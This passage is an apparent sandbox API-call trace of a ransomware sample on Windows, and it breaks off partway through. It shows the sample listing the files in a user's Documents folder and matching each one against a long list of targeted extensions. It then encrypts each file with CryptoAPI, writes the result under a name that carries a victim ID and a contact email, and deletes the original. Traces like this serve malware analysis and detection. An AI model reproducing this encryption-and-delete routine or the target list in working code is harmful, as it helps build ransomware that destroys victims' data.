	[0189.572] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.572] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.572] StrStrW (lpFirst=".xls", lpSrch=".") returned=".xls"
	[0189.572] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.572] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xls") returned=".xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.572] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.573] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.573] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.576] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xa202, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0xa202, lpOverlapped=0x0) returned 1
	[0189.579] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.579] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb088) returned 1
	[0189.581] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.582] CryptCreateHash (in: hProv=0xfcb088, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.582] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.582] CryptHashData (hHash=0xfb8f70, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.582] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.582] CryptDeriveKey (in: hProv=0xfcb088, Algid=0x6610, hBaseData=0xfb8f70, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb91f0) returned 1
	[0189.582] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.582] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xa202, dwBufLen=0xa202 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xa210) returned 1
	[0189.584] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.584] RtlMoveMemory (in: Destination=0xfe7390, Source=0xfdd180, Length=0xa202 | out: Destination=0xfe7390) 
	[0189.584] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.584] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe7390*, pdwDataLen=0x18a1ec*=0xa202, dwBufLen=0xa210 | out: pbData=0xfe7390*, pdwDataLen=0x18a1ec*=0xa210) returned 1
	[0189.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.586] CryptDestroyKey (hKey=0xfb91f0) returned 1
	[0189.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.587] CryptDestroyHash (hHash=0xfb8f70) returned 1
	[0189.587] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.587] CryptReleaseContext (hProv=0xfcb088, dwFlags=0x0) returned 1
	[0189.587] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.587] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.588] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.588] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.589] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 136
	[0189.589] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.589] WriteFile (in: hFile=0x390, lpBuffer=0xfe7390*, nNumberOfBytesToWrite=0xa210, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe7390*, lpNumberOfBytesWritten=0x18a648*=0xa210, lpOverlapped=0x0) returned 1
	[0189.594] CloseHandle (hObject=0x390) returned 1
	[0189.594] CloseHandle (hObject=0x388) returned 1
	[0189.594] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls")) returned 1
	[0189.601] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls")) returned 0
	[0189.601] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50a1b5e0, ftCreationTime.dwHighDateTime=0x1d96d1b, ftLastAccessTime.dwLowDateTime=0xf76445f0, ftLastAccessTime.dwHighDateTime=0x1d96fc3, ftLastWriteTime.dwLowDateTime=0xf76445f0, ftLastWriteTime.dwHighDateTime=0x1d96fc3, nFileSizeHigh=0x0, nFileSizeLow=0x13e56, dwReserved0=0x0, dwReserved1=0x0, cFileName="xvBk0emV3rDKqGyNq3.docx", cAlternateFileName="XVBK0E~1.DOC")) returned 1
	[0189.601] lstrcmpW (lpString1="xvBk0emV3rDKqGyNq3.docx", lpString2="..") returned 1
	[0189.602] lstrcmpW (lpString1="xvBk0emV3rDKqGyNq3.docx", lpString2=".") returned 1
	[0189.602] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.602] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="xvBk0emV3rDKqGyNq3.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\xvBk0emV3rDKqGyNq3.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\xvBk0emV3rDKqGyNq3.docx"
	[0189.602] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\xvBk0emV3rDKqGyNq3.docx") returned 95
	[0189.602] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.602] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\xvBk0emV3rDKqGyNq3.docx", cchLength=0x5f | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx") returned 0x5f
	[0189.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.602] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.603] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx"
	[0189.603] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx") returned 95
	[0189.603] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.603] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0189.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.603] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.d